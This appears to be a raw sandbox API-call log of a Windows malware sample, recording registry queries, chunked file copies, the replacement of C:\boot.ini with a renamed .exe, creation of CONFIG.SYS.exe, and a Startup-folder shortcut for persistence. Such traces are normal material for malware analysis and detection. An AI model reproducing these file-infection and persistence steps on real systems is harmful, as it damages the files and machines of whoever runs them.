"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->61440"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x00000120","nNumberOfBytesToRead->39287"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->39287"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->211"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->211"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->268"
"20190731004116.506","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x00000110","nNumberOfBytesToWrite->268"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Desktop"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Desktop","dwType->1","lpData->C:\Documents and Settings\janettedoe\Desktop","cbData->90"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x00000110","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Desktop"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Desktop","dwType->1","lpData->C:\Documents and Settings\All Users\Desktop","cbData->88"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000110","lpValueName->Generation"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000110","hKey->0x0000011c","lpSubKey->FileExts"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000110","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000110","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->SystemFileAssociations\."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000122","hKey->0x00000062","lpSubKey->Network\SharingHandler"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000122","lpValueName->(null)"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x00000120","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x00000120","lpValueName->ChkAccDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000120","lpValueName->ProductType"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->0x000000b8","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Personal"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Local Settings"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->RsopDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->RsopLogging"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000000b8","lpValueName->UserEnvDebugLevel"
"20190731004116.517","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryW","SUCCESS","0x773d0000","lpFileName->comctl32.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryW","SUCCESS","0x76990000","lpFileName->ntshrui.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x76980000","lpFileName->LINKINFO.dll"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->ProductType"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001b8","lpValueName->SrvsvcDefaultShareInfo"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\boot.ini"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\boot.ini.exe","lpNewFileName->C:\boot.ini"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->268"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c8","lpFileName->C:\CONFIG.SYS.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->0x00000080"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","device","DeviceIoControl","SUCCESS","","hDevice->0x000001b8","dwIoControlCode->0x000900c0","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120ece4","nOutBufferSize->0x00000040","lpBytesReturned->0x0120ecdc","lpOverlapped->0x00000000"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup\Soft.lnk","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001be","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001be","lpValueName->DriveMask"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Start Menu"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Start Menu","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu","cbData->96"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.557","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Start Menu"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Common Start Menu","dwType->1","lpData->C:\Documents and Settings\All Users\Start Menu","cbData->94"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Common AppData"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001bc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Common AppData","dwType->1","lpData->C:\Documents and Settings\All Users\Application Data","cbData->106"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->AppData"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
